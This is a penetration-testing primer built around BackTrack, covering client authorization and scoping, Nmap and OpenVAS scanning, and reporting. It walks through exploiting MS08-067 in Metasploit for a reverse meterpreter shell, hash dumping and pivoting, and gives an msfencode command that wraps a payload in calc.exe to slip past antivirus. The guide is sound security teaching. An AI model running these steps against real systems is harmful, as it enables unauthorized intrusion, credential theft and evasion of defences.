Fighting cyber threats, fraud, or both – Join IBM Cyber Beat Live on JULY 26, 2016 | 12:30PM ET (11:30AM CT)
Many of us have been victims of a fraud attack—often, multiple times in one...
A Crash Course in Pentesting with Backtrack
by Nick Hensley
In this article, we will give you a crash course in pentesting. This article is meant to be a basis or primer if you wish; it will teach you what a penetration test is and what it is not. We will show you the basic steps that go into virtually all penetration tests. And teach you what you need to be aware of, what to look for, and how to get started. That being said, this is not a “how to hack” article that will teach you how to break into some unsuspecting company’s website and further penetrate their internal infrastructure.
There are many that consider obtaining Domain Admin as the ultimate goal. And yes, it is definitely a cool thing to do, BUT it’s not the only thing that one should try and accomplish when performing a penetration test. Within most companies there exist a large number of systems and devices that are not members of the Domain. There are many vectors and avenues of attack that malicious individuals will use in order to gain access to your network, some of these include using SQL injection techniques on your company’s main website, probing for misconfigured applications and services, brute-forcing, utilizing default username/password combinations, and Social Engineering to name a few.
What most attackers are going to do is look for the ‘low hanging fruit’ which can really run the gambit from the before mentioned default username/password combination to unpatched servers with common exploits.
I think it was on my very first pentest (long before Metasploit was ever dreamed up) when I asked my mentor “where do I start” and he replied “find the oldest thing you can on the network and go after it.”
That being said, what is it that your company or client wants to receive out of the pentest? That’s actually the second question I ask clients when initially engaging with them prior to beginning a test. But the real answer is that they want an actionable report! What the client needs is a report showing what you did, how you were able to accomplish the exploitation, and remediation information. During a test you will often be able to exploit one system, which may lead to another system and then to another entirely different subnet.
The most important thing that you need before you begin a penetration test is a signed agreement between you and the client outlining the scope, time frame, and most importantly, the signature of a person who has the AUTHORITY to give you permission to attack their network.
And don’t forget that if anything ‘happens’ during a penetration test that’s even IT related at all, someone is going to come looking for you or your phone is going to start ringing. I’ve even received calls with someone asking “What are you doing?” because some server crashed even before I had fired up my laptop for the day! Penetration testing can create a lot of network traffic and the pentester being the wild card will catch the blame, so timing the pentest can be critical.
Defining the Scope of the test and getting Permission
I use a form when I engage with clients. The form explains the methodology I’ll be using and has places where they can fill in information specifying what they want tested and what they don’t want tested along with special attention targets and check boxes for some items. Speaking of methodology, if you are new to penetration testing or thinking about getting into it, I would recommend checking out the Open Source Security Testing Methodology Manual (OSSTMM) and the Open Web Application Security Project (OWASP) which can be found at the their respective links:
• OSSTMM: http://www.isecom.org/research/osstmm.html
• OWASP: https://www.owasp.org/index.php/OWASP_Testing_Project
OWASP is actually in the process of updating to v4 and have a draft available on their site.
Your agreement will no doubt look differently than ones I have used, and will be living document and will change over time. At a minimum I would suggest including the following in any agreement between you and your client:
• Start and End Date
• Times the Testing can take place
• List of internal contacts
• Your contact information
• List of Targets
• Special Attention Targets
• Targets to Exclude
• Type of Testing to be Performed along with the Depth of the Engagement
• If they want you to Perform Denial of Service Attacks a space to justify it
• A Disclaimer about the Possibility of ‘Bringing Down’ a System(s) or Service(s)
• A place for them to release you from damages that may occur
• Signature of the Approver and his/her Title
Often when first engaged with clients they won’t have any idea what their options are and in some cases what they even want tested. So I will explain to them what I can do, describe different attack vectors and avenues a malicious person can and will use to try and gain access to their infrastructure. This can take some time and will usually be very back-and-forth between you and your client. Both sides asking and answering questions.
The First real question I ask is “What is your primary concern, that is what you are most concerned with, or where do you think you have the most risk?” Their answer to this question will help you to guide them throughout the rest of the conversation. Some clients may have just had a breach from the outside, others may have installed some new piece of network hardware and noticed they have a lot of outbound connections to countries their employees should have no business need to access, and yet others with only a test to satisfy compliance. Depending on their answer, I will usually make a recommendation and have them agree that my recommendation is indeed what they are asking/looking for. Sometimes it will depend on what they have had tested in the past. If it’s a new client, or one that hasn’t had a true penetration test in a while, I will suggest that the test basically utilize a three pronged approach, and recommend at a minimum the testing be performed, by focusing on the external (from the Internet), internal (user space and server), and web applications (both Internet accessible and internal).
At times I will have clients say something like ‘Well, we’re not really worried about internal’, this when I explain to them about what happens when someone spoofs an email from CEO and sends a malicious PDF file to their Domain Admin that creates an outbound connection to the attacker’s laptop, and that the attacker will then have a direct tunnel into their internal network, and ask what happens if he installs a key-logger on that admin’s machine?
Again the main point here is that the conversation will go back-and-forth and sometimes may involve multiple conference calls with different people before they decide on what they want tested, and you may have to explain and give examples about what the attacker is capable of. At the end of the day you are working for the client, and will want to provide them with the best course of action given their specific needs. The ultimate goal is to agree upon what is to be done, and have the appropriate person sign off on what you are about to do.
Preparing your Attack Platform
Assuming you now have the legal authority to perform a penetration test against someone’s network you will need the proper tools!
For the rest of this article I will talk about some of the most common tools that nearly every penetration tester uses. I may not go into detail on all of these due to scope, but this section should get you set up, and give you the basics as well as point you to some things that you can follow up on. However, everything I am about to show you, one should be able to replicate on their own personal home network. For that reason I will try and focus strictly on free and open source tools.
As most corporate infrastructures are a heterogeneous mix of network devices and operating systems all running different services and at different patch levels, I recommend using at least two different operating systems. Your first operating system should be a Windows OS, and your second a Linux distribution.
When anybody asks me about how they should set up their attack platform, I usually recommend running these on the same machine. Using a Windows OS (I’m partial to Windows 7 Pro 64-bit) as their main install, and then running a Linux VM. Over the years there have been many Linux-based distributions released; some made for graphic artists, video editing, and penetration testing. The main distro that you will see many penetration testers using and you will easily be able to find the most information on is BackTrack, and that’s what we will be using.
BackTrack’s website www.backtrack-linux.org defines their distro as “BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumb drive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester”.
I’ll start out by assuming you have a Windows machine. First thing you will need is a way to run the BackTrack VM. If you don’t already have it head over to VMware’s website and download vmplayer; it’s free for personal non-commercial use http://www.vmware.com/products/player/. Vmplayer’s installation is very straight forward so I won’t cover that here. Next you need to download the BackTrack VM from http://www.backtrack-linux.org/downloads/ as there are many different versions and options you can pick when downloading just make sure you set your options as follows – we will be downloading the latest BackTrack 5 R3: Figure 1.
BackTrack decided to use 7zip to compress their file, so if you have an issue extracting the archive you can download 7zip from http://www.7-zip.org/ and use it to extract the vm. Once you have everything downloaded, installed, and extracted. Go ahead and launch VMWare Player. The First thing you will need to do before you ‘Play’ the BackTrack VM is to change a setting or two. Click on ‘Edit virtual machine settings’ on the right select ‘Network Adapter’ and then on the left, Change the Network Adapter Connection type from ‘NAT’ to ‘Bridged’ and click the ‘Save’ button so that it looks like this: Figure 2.
Figure 2. Bridged
The BackTrack virtual machine comes set for 768M of RAM – Depending on the total amount of RAM you have available to your system you may want to increase that!
Now go ahead and start the BackTrack virtual machine by clicking on ‘Play virtual machine.’ The first time you start up any virtual machine you have downloaded or moved from machine to machine VMWare Player will ask you a question, select the ‘I copied it’ button (Figure 3).
Figure 3. I copied it
When the VM first starts up, if you have any USB or other devices connected it will give will prompt you with another message, letting you know that you can connect those devices to the virtual machine – you do not want to do that here.
Once the BackTrack VM has finished booting you will see a login prompt like this: Figure 4. The default login is ‘root’ and the password is ‘toor.’
Figure 4. Login
Once you are at the prompt, go ahead and make sure you have an IP address by typing:
You should see that your DHCP server has handed you an IP address on your local network, if you see something other than the right subnet for your network, you need to go back and check that you are running in Bridged mode and not NAT. While things will work with a NATted IP address, if you are trying to exploit a machine on a real subnet you will have to make changes to your host to pass the traffic back-and-forth.
The output from the
ifconfig command should look like this: Figure 5. Next start up the windows manager with the command:
Figure 5. Ifconfig command output
Then launch the Terminal application by clicking on the icon at the top left of the screen that looks like a little black box with >_ inside of it (Figure 6).
Figure 6. Metasploit registration
This next step will take a while, but we will make sure everything is up to date and we want to install the new version of Metasploit so issue the following commands when asked if you want to uninstall Metasploit click the ‘Yes’ button: Listing 1.
Listing 1. Uninstall Metasploit
apt–get upgrade –y
chmod +x metasploit–latest–linux–installer.run
./metasploit–latest–linux–installer.run —prefix /opt/metasploit —mode unattended
With the new version of Metasploit you will need to register in order to get updates.
If you want to register open up a browser and go to https://localhost:3790.
You will see the following screen (Figure 7) click the ‘GET PRODUCT KEY’ button (Figure 8).
Figure 7. Metasploit registration
Figure 8. Getting the Product Key
Next pick which version you want Pro or Community (I recommend the Community edition otherwise Pro will only work for 7 days) then type in all your information to get your free license key! (Figure 9)
Figure 9. Free Licence Key
BackTrack comes with a lot of plugins for Firefox, you may need to disable these in order to register!
After you have filled out their form click on the ‘GET FREE LICENSE’ button.
Once you have registered in order to update Metasploit, at the command prompt type:
Host Discovery and Enumeration
Now we are ready to identify live hosts on our test/home network. As you saw earlier, our IP was 192.168.1.115. So that means our home subnet will be 192.168.1.0/24 and for this we will be using Nmap.
Nmap (or Network Mapper) is a security scanner that provides many features for probing computer networks, such as host discovery, service detection, operating system fingerprinting, and a whole lot more.
Nmap is very powerful and has a ton of options you can read more about it here – http://nmap.org, and all its various options. A full reference of all the switches for Nmap can be found here – http://nmap.org/book/man.html. But I will be showing a few Nmap commands that will help ease your way.
The first command we are going to run will let us get a list of all the live hosts on our network and output those to a file. You could skip this step and simply run the next Nmap command but it will take a whole lot longer! We also want to exclude our Attack Platform so you will need to know the IP address of your BackTrack virtual machine along with the IP of your Windows host OS (and any other hosts you don’t want to scan). When the command completes you will have a live_hosts.txt file but let’s check it to see what hosts you found on your network (Figure 10).
nmap -sn -T5 192.168.1.0/24
|grep ‘Nmap scan’|cut -d’ ‘ -f5 >live_hosts.txt
Figure 10. Nmap hosts
Now we have a nice list of all the hosts on our network that are live. We need to scan all these hosts, enumerate the ports, check services and versions, and run some of the built in Nmap scripts which will give us a good idea of what we’re up against. If you’re curious about all these options you can simply type “nmap” at the command prompt and it will tell you what each option does.
nmap -vv -Pn -sS -p1-65535 -sV -sC
–script-args=unsafe=1 -O -iL live_hosts.txt -oA my_subnet
I added the
--script-args=unsafe=1 option (you didn’t use to have to do this, but with the newer versions of Nmap you miss quite a bit of exploitable goodness. If you are unsure, you can leave that option out).
Once Nmap fires off, you should see something that looks like this appear in your terminal: Figure 11.
Figure 11. Nmap terminal
Next up you will need to identify if any of these hosts contain vulnerabilities. Vulnerability Scanners are another class of tool that any pentester will be able to use to quickly identify hosts which may be vulnerable to exploitation. Usually I would start with a vulnerability scanner like Nessus or Core Impact, and then run an Nmap scan. But for the workflow here and wanting to give you the ability to use BackTrack using only free tools so that you can replicate this in your test or home environment; we will be using OpenVAS.
Nessus does have a “free for home use” license and while I suggest you install it and give it a try, it is limited to the number of IP addresses that you can scan. The Full version basically has no limitations and for the price can’t be beat. Nessus can be found at Tenable’s website and can be downloaded here – http://www.tenable.com/products/nessus. Nessus currently has over 50,000 checks for vulnerabilities and you can also add in credentials (if known) for an even deeper analysis.
There are a few open source free vulnerability scanners out there, among them are OpenVAS which can be found at http://www.openvas.org/. OpenVAS currently has over 30,000 checks, so you get what you pay for. Another reason we are talking about OpenVAS is because it comes installed on BackTrack. But it does require a few steps in order to get it up and running.
So let’s get OpenVAS setup and configured, some of these commands will require user input for instance the setup of the SSL certificate (but you can just hit enter on all the prompts), and when creating the Amin user you will be asked to input a password (Listing 2).
Listing 2. OpenVAS
openvas–mkcert–client –n om –i
openvasad –c ‘add_user’ –n admin –r Admin
openvasmd –p 9390 –a 127.0.0.1
openvasad –a 127.0.0.1 –p 9393
gsad —http–only —listen=127.0.0.1 –p 9392
Now that you have configured OpenVAS open your browser (Firefox) and surf over to 127.0.0.1:9392 and you will see the default login screen, go ahead and enter ‘admin’ for the Username we created above and the ‘Password’ you typed in. The default login screen will look like this (Figure 12).
Figure 12. Openvas login
Once you login you will see the main page which looks like this (Figure 13).
Figure 13. Openvas Main Page
On the left hand menu click on ‘Target’ and add your subnet then click “Create Target” (Figure 14).
Figure 14. Create Target
Next click on ‘New Task’ and pick a name for your task, select the targets ‘mine’ which we just created from the drop down list and select the ‘Scan Config’ you wish to use, we will use ‘Full and Fast’ then click the ‘Create Task’ button and you should see that it was setup correctly (Figure 15).
Figure 15. Tasks
Then click the triangle Play Button icon (if you mouse over it, it will say ‘Start Task’) on the right hand side, your scan will begin (warning this can take a long time) once the scan has finished the status will show as ‘Done.’ Also be aware that when you begin to run your scan that it can take a long time, so be patient, you may not see the status bar update for a while. OpenVAS is very processor and memory heavy (Figure 16).
Figure 16. Start Task
Click on the magnifying glass icon to view the details of your report (Figure 17).
Figure 17. See the details
On the next screen click on the magnifying glass icon again for the details of your scan if you scroll down, you will see the vulnerabilities that were identified for each host (in this example MS09-001) you can then check Metasploit using the search function for any Modules relating to this vulnerability (Figure 18).
Figure 18. Vulnerability check
The Metasploit Project was created by HD Moore and is a project which provides information about security vulnerabilities and aids penetration testing, it’s best-known for its open-source Metasploit Framework which is a tool for developing and executing exploit code. When your Nmap scan has completed, let’s go ahead and load the data into Metasploit. We will first launch Metasploit, then create and connect to a new workspace to work with, load the Nmap scan results and verify things completed with the
hosts command (Listing 3 and Figure 19).
Listing 3. Hosts command
workspace –a my_network
Figure 19. Hosts_load
If at any time you need help in Metasploit you can issue the
help command, also each command usually will take the
-h option, for example,
A shortcut to running Nessus from the command line, is to actually run it from within Metasploit itself; however, I like to run Nessus from the command line with the
-oA switch which will ‘Output in the three major formats at once.’ This can be incredibly useful if you need to grep through the Nmap output or otherwise sort through the output and use that information with other tools. You can, however, issue all the same commands from within Metasploit at the command prompt you simply type
db_nmap instead of ‘nmap’ from the command line, which we just finished.
Metasploit has a LOT of different auxiliary modules and tons of commands, but for this article we obviously can’t cover them all. We will however hit on some of the major commands and give you an understanding of how to use the tool and some of the most common things you will be doing inside the Metesploit console. With that in mind let’s take a look at what services were found with Nmap that we have imported.
As you can see, Nmap did a really good job of identifying the open ports and what services and versions are running on those ports (Figure 20).
Figure 20. Services
Let’s take a look at the open services on just one of these hosts, for example, we will use 192.168.1.197 (Figure 21).
Figure 21. Services_ip
Notice that port 445 was open on this host. Additionally it was open on 3 other hosts so we can use one of Metasploit’s many auxiliary scripts to perform some more scanning and enumeration. The ‘show options’ command will list out all module options for the currently loaded module (and payload) in order for a module to run successfully you must complete all required fields marked by ‘yes.’ In this example the only required field that is not pre-populated is RHOSTS. To set the fields value you would usually use the command
set RHOST <IP Address>, but we will use the short cut services
-p 445 with the
-R switch to add all host with port 445 open to the RHOSTS (Figure 22).
services -p 445 -R
Figure 22. RHOSTS
As you can see we were able to enumerate the shares on my Myth TV back-end server (Figure 23).
Figure 23. Shares
Earlier you may have noticed that the host 192.168.1.197 was being reported both as a Windows 2000 and XP box, but we also saw that it had port 445 open on it. So let’s see if it hasn’t been patched and is susceptible to the MS08-067 vulnerability by actually trying to exploit it! As we mentioned before, Metasploit has a lot to it, so we need to know the name of the module we will use or somehow find it. Remember, if you are unsure of how to use a command you can usually add a
-h to the end of it, for example
search -h: Figure 24.
Figure 24. Search -h
Ok, now that we see how to use the search function, let’s try finding the MS08-067 module:
You should have been returned a list that looks something like this, with the module that we were looking for listed (Figure 25).
Figure 25. Module listed
Once we have identified the proper module we want to use we can tell Metasploit to use it, and go ahead and take a look at the options after it loads.
Let me take a minute here and explain the difference between an exploit like this MS08 one, and the auxiliary module we loaded and used earlier. Once you have all your required fields set you will execute an auxiliary module with the
run command. An Exploit will use the command
exploit. But this isn’t the only difference, the main difference between an exploit and auxiliary module is that an exploit needs a payload in order to do anything, and there were…what…like 300 payloads available? Each exploit is matched to the payloads it will work with, not all payloads will work with all exploits. So you will have to identify which payload you want to use that will work with the particular exploit you are going to use. Once you have loaded an exploit module you can see which payloads are available to that module with the
show payloads command. Now let’s continue….
set PAYLOAD windows/meterpreter/reverse_tcp
Ah, now you can see that not only are there required fields for the MS08 module, but that there are also required fields for the Payload (Figure 26).
Figure 26. Payload
We will keep going and set all these values, but first I want to point out that while LPORT is pre-populated to listen on port 4444, I usually change this to something that I know will pass, as a lot of companies have network devices which will only allow certain ports to pass from subnet to subnet, and port 443 is usually a pretty safe bet. Now we can set our values for RHOST (the remote or target IP address), the LHOST (our machines IP address), and the LPORT (what port our machine will listen on for connections). Earlier I had you set your virtual machine on Bridged mode, if we hadn’t done that we would have the target host trying to connect to our Windows Machine first then we would to forward that connection onto our BackTrack VM! (Figure 27)
set RHOST 192.168.1.197
set LHOST 192.168.1.115
set LPORT 443
Figure 27. Payload options
When you have all of your fields set correctly issue the command
exploit and if the host is vulnerable you will be greeted with the meterpreter > prompt (Figure 28).
Figure 28. Meterpreter
From here you can do many different things, such as launch post exploitation modules, upload and download files, take screenshots, dump hashes, etc. After all, you now own that box.
There are a handful of commands I usually run when I first receive a meterpreter shell, these are sysinfo, hashdump, route, and shell. It is important to look at the routing info on any machine you exploit as it may be a dual-homed machine and if it is, you can use Metasploit to pivot through this newly exploited machine to a whole new subnet (Figure 29)!
Figure 29. Meterpreter commands
If you want to keep your meterpreter session alive but continue to try and exploit other hosts use the [Crtl+Z] key combination and Metasploit will ask you if you want to background that session. To see what active sessions you have you can always simply type ‘sessions’ at the Metasploit prompt and you will be shown which sessions are active. In order to reconnect to a session use the command
sessions -i 1. Again you can always use the
-h switch with Metasploit commands (Figure 30).
Figure 30. Sessions
Brute-forcing is a technique that repeatedly tries different combinations of usernames and password to try and log into a service or break an encrypted password. There are two basic types of attacks – dictionary and rainbow tables.
Dictionary Attacks can be made using dictionary files or lists of passwords, but brute-force attacks also run through all combinations of character sets…say 0-9, A-Z, a-z and special characters. If you know the length and password policy that a company uses it will greatly cut down on the time it uses to crack a password. For dictionary files, I would suggest searching the Internet. A good starting point would be Skull Security at http://www.skullsecurity.org/wiki/index.php/Passwords.
Rainbow table attacks are basically huge files with different character sets that have already been hashed using all combinations of the set, and will usually crack a password long before a pure brute-force attempt using dictionary or non-computed hash attempts. If you’re interested in rainbow tables, I strongly recommend checking out Free Rainbow Tables where you can download tables which have already been created with many different character sets available. You can find them at https://www.freerainbowtables.com/.
One final note on passwords – you may decrypt or find users often reuse passwords. Once you find a password I always add it to my dictionary file. That way as you continue your test you can use those passwords against other hosts and services.
Another item an internal penetration test should cover is the network infrastructure. There are many different ways to go about testing the infrastructure including modules inside of Mestasploit. All it takes is one older or misconfigured Cisco device on the network and you can literally have access to ever Cisco device on the network. From there you can do things like turn on and off ports, add your host to a restricted list, and change and monitor span ports.
Daniel Compton over at Common exploits has created a nice script called Cisc0wn that will make your life easier. He describes Cisc0wn this way:
Cisc0wn is simply a bash script that pulls various tools and enumeration into one simple command for ease, so is not really a tool in itself. It doesn’t do anything extra than you can’t really already do, it just saves running several different tools and commands and entering the same info over and over. It uses Metasploit modules and snmpwalk for most of the tasks.
Cisc0wn can be found at http://www.commonexploits.com/?p=503 along with a nice walk-through of how to use it. I strongly suggest you check it out when you have the time.
Many corporations now run VoIP for their phone networks. If it’s in scope or you come across a subnet that has a lot of VoIP devices, don’t forget to include these in your tests. Among other things an attacker may be able to break into is a user’s voicemail and listen to messages, or perform a man-in-the-middle attack and actively record user’s phone calls.
SIPVicious is simply defined as “… a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools:” And it’s basically that, a tool for auditing SIP based VoIP systems and can be found at http://code.google.com/p/sipvicious/. If you have never heard of SIPVicious and are unfamiliar with it, I would also recommend checking out http://blog.sipvicious.org/.
Databases can be a particularly interesting subject and could very well be an entirely separate article. Companies store all sorts of information in databases. In some cases everything is open game, but I have had certain tests where the company stores personally identifiable information or PII, and have said go ahead and try and exploit the databases. BUT they wanted me to stop at the table level, and not actually look at the contents. This is very important – STOP where the client tells you to, remember you document, you are only allowed to test what they want you to, and only as deep as they would like.
BackTrack has quite a few tools built in for Databases, you can access these by going to the Applications> BackTrack> Vulnerability Assessment> Database Assessment.
Metasploit also has a lot of function built around databases, I suggest you start by looking at the auxiliary modules first.
Camera systems: https://community.rapid7.com/community/metasploit/blog/2012/01/23/video-conferencing-and-self-selecting-targets.
At some point you may find yourself needing to look at what’s going on, on the network, or need to do some packet analysis. We’re not going to talk about that here, but it is something to be aware of.
“Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.” and can be found at www.wireshark.org. Again this is something else for you to play with. Fire it up on your test or home network, and I think you’ll be surprised at what you see.
Default installs and configurations are often left with the default username and password. If you come across a login page to say a router, web application, camera system, etc. It’s always worth Googling for the specific device or software (and sometimes version) + “default password”, as you will be surprised as to how often someone sets up a device or installs some new software, configures it, then just leaves the default login. Additionally, if you are having a hard time finding the default go ahead and look for the setup or installation guide since they will let you know whether or not there is a default password. Manufacturers are becoming more security aware and do not have defaults anymore and instead require the user to input their own password during initial setup.
Undoubtedly you will find some machine that you should be able to exploit, but try as you may, you just can’t get it to work! Most likely the culprit will be some type of anti-virus. There are things you can do to get around AV but again, that’s well beyond the scope of this article. With that said, a safe place to start is the Metasploit Framework, included is a tool called msfpayload and msfencode which allows you to encode your payload with quite a few different options. You may have to try and try again utilizing different options before you will be actually get your payload to bypass the AV. The basic format of the command will look like this:
msfpayload windows/meterpreter/reverse_tcp LHOST=
192.168.1.115 R | ./msfencode -t exe -x calc.exe -k -o
exploit.exe -e x86/shikata_ga_nai -c 5
Remember we said earlier that the whole point of penetration testing, is not only to find the holes before an attacker would, but also to deliver a report to your client with actionable items. I create all of my reports by hand.
What I do is show the workflow that I followed during the test and include pictures where needed. Remember that this report may go through quite a few hands and you may want to show step-by-step how you exploited a specific device, since there may be a technical person who would want to recreate the steps, or test them again after the vulnerability has been remediated. Another thing I show is the number of overall vulnerabilities that I was able to identify during a test. If you have a client who performs yearly testing they may use these numbers as metrics at some point to show that, for example, last year they had 500 critical and high severity issues, but this year they only have 75.
I always make recommendations based on my test. For instance, I may see that a client is still using Telnet or FTP, which pass everything (including user credentials) unencrypted and in the clear, and if someone is sniffing the traffic (remember Wireshark?) they can easily harvest the credentials of any user logging into those systems.
Since I use Nessus and Core Impact, one final thing I include is my scan data in the form of a report. There may be some system on the network with a vulnerability that I did not get around to exploiting, or there may be no publicly available exploits. This doesn’t mean that there won’t be some released in the future and I always recommend that these issues be remediated. The great part about a lot of these reports is that they include links to the original vulnerability along with the fix, and that translates to less questions that I have to answer or follow up on!
Hopefully you have found this article informative and now have a better idea of where to start when performing penetration tests. Since this was an article for a magazine realizing there is a limited amount of space, there may have been some things that I couldn’t cover in as much depth as I would have liked. But Google is your friend, and the information is out there. One thing that I touched on, but did not go into details on is the testing of web applications. That subject alone would have more than tripled the size of this article. If you are interested in the penetration testing of web applications I would suggest taking a look at w3af and Burp Suite which can be found at http://w3af.org/ and http://portswigger.net/burp/.
One final note; you will want to be aware of compliance. Many of your clients will be having a penetration test done in order to be in compliance with requirements such as like PCI-DSS, for an audit, or meet some other regulatory or industry standard. If you are engaged for such a test, make sure you know that your methodology and test plan will meet their compliance needs as many of them require particular items be tested in a specific way.
About the Author
Nick Hensley having held his CISSP since 2002 is a seasoned Information Security Professional with 12 years of industry experience. He currently manages a team of penetration testers; and performs penetration and application security testing along side his team, supporting roughly 150 different clients. His background covers a broad range of managerial and technical positions. Nick’s expertise lies in Penetration Testing, Computer Forensics, Electronic Discovery, Intrusion Detection and Prevention Systems, and Security Architecture Design and Implementation. He can be reached via email at [email protected]